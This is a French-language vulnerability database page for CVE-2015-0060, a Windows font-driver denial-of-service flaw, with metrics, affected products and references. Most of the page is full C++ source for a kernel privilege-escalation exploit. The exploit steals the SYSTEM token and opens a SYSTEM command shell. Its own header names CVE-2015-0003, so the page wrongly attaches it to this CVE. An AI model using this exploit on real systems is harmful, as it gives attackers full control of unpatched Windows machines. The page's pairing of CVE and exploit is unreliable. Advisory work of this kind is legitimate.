CVE-2015-0060 : Détail

CVE-2015-0060

0.29%V3
Local
2015-02-11
01h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The font mapper in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly scale fonts, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Windows Font Driver Denial of Service Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-19 Category : Data Processing Errors
Weaknesses in this category are typically found in functionality that processes data. Data processing is the manipulation of input to retrieve or save information.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.7 AV:L/AC:M/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 37098

Date de publication : 2015-05-24 22h00 +00:00
Auteur : Sky lake
EDB Vérifié : No

// ex.cpp /* Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP CVE-2015-0003 March 2015 (Public Release: May 24, 2015) Tested on: x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 x64: Win 2k8 SP1 | Win 2k8 R2 SP1 Author: Skylake - skylake <at> mail <dot> com */ #include "ex.h" _ZwAllocateVirtualMemory ZwAllocateVirtualMemory; _PsLookupProcessByProcessId PsLookupProcessByProcessId; _PsReferencePrimaryToken PsReferencePrimaryToken; DWORD Pid; ATOM atom; BOOL KrnlMode, bSpawned; DWORD_PTR WINAPI pti() { #ifdef _M_X64 LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); #else LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); #endif } BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) { DWORD_PTR dwIndex, dwMask; #ifdef _M_X64 dwMask = ~0xf; #else dwMask = ~7; #endif // dwCurrentValue &= dwMask; for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) { if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) { // pdwStructure[dwIndex] = dwNewValue; return TRUE; } } return FALSE; } BOOL WINAPI Init() { HMODULE hMod = NULL; PVOID Base = NULL; OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; PSYSTEM_MODULE_INFORMATION pm = NULL; BOOL RetVal = FALSE; __try { if( !GetVersionEx( &ov ) ) __leave; if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) { atom = 0xc039; } else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) { atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a; } if( !atom ) __leave; _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); if( !ZwQuerySystemInformation ) __leave; ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); if( !ZwAllocateVirtualMemory ) __leave; ULONG len; LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); if( !status ) __leave; pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); if( !pm ) __leave; status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); if( status ) __leave; CHAR szKrnl[MAX_PATH] = { 0 }, *t; for( ULONG i = 0; i < pm->Count; ++i ) { if( strstr( pm->Module[i].ImageName, "exe" ) ) { t = strstr( pm->Module[i].ImageName, "nt" ); if( t ) { strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); Base = pm->Module[i].Base; break; } } } hMod = LoadLibraryA( szKrnl ); if( !hMod || !Base ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); if( !PsLookupProcessByProcessId ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); if( !PsReferencePrimaryToken ) __leave; PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); Pid = GetCurrentProcessId(); RetVal = TRUE; } __finally { if( pm ) LocalFree( pm ); if( hMod ) FreeLibrary( hMod ); } return RetVal; } LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { LPVOID pCurProcess = NULL; LPVOID pSystemInfo = NULL; PACCESS_TOKEN systemToken; PACCESS_TOKEN targetToken; PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); targetToken = PsReferencePrimaryToken( pCurProcess ); systemToken = PsReferencePrimaryToken( pSystemInfo ); // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 ); KrnlMode = TRUE; return 0; } VOID WINAPI leave() { keybd_event( VK_ESCAPE, 0, 0, NULL ); keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); } LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) { if( bSpawned ) { leave(); ExitProcess( 0 ); } switch( message ) { case WM_CREATE: SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); FlashWindow( hWnd, TRUE ); keybd_event( VK_LWIN, 0, 0, NULL ); break; case WM_CLOSE: DestroyWindow( hWnd ); break; case WM_DESTROY: PostQuitMessage( 0 ); break; case WM_TIMER: KillTimer( hWnd, ID_TIMER ); leave(); DestroyWindow( hWnd ); break; default: return DefWindowProc( hWnd, message, wParam, lParam ); } return 0; } int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow ) { WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; HWND hWnd = NULL; MSG Msg = { 0 }; SIZE_T size = 0x1000; LPVOID addr = ( LPVOID ) 1; if( !Init() ) return 1; if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) { // return 1; } DWORD_PTR p = pti(); if( !p ) return 1; #ifdef _M_X64 *( ( PDWORD_PTR ) 0x10 ) = p; *( ( LPBYTE ) 0x2a ) = 4; *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; *( ( PDWORD_PTR ) 0xa8 ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( PDWORD_PTR ) 0x408 ) = 0x800; *( ( LPWORD ) 0x410 ) = atom; *( ( LPBYTE ) 0x412 ) = 1; #else *( ( LPDWORD ) 0x08 ) = p; *( ( LPBYTE ) 0x16 ) = 4; *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; *( ( LPDWORD ) 0x6c ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( LPDWORD ) 0x408 ) = 0x800; *( ( LPWORD ) 0x40c ) = atom; *( ( LPBYTE ) 0x40e ) = 1; #endif wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = TEXT( "Class" ); if( !RegisterClassEx( &wc ) ) return 1; hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL ); if( !hWnd ) return 1; ShowWindow( hWnd, SW_HIDE ); UpdateWindow( hWnd ); while( GetMessage( &Msg, NULL, 0, 0 ) ) { if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 { if( !KrnlMode ) { Msg.hwnd = ( HWND ) NULL; } else { Msg.hwnd = hWnd; if( !bSpawned ) { ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); bSpawned = TRUE; } } } TranslateMessage( &Msg ); DispatchMessage( &Msg ); } return ( int ) Msg.wParam; } // EOF //ex.h #pragma once #include <windows.h> #include <stdio.h> #include <tchar.h> typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process ); typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process ); typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemModuleInformation = 11 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; #define ID_TIMER 0x1 #define WM_SYSTIMER 0x118 // EOF

Products Mentioned

Configuraton 0

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_8 >> Version -

Microsoft>>Windows_8.1 >> Version -

Microsoft>>Windows_rt >> Version -

Microsoft>>Windows_rt_8.1 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2012 >> Version -

Microsoft>>Windows_server_2012 >> Version r2

Microsoft>>Windows_vista >> Version -

Références

http://www.securityfocus.com/bid/72472
Tags : vdb-entry, x_refsource_BID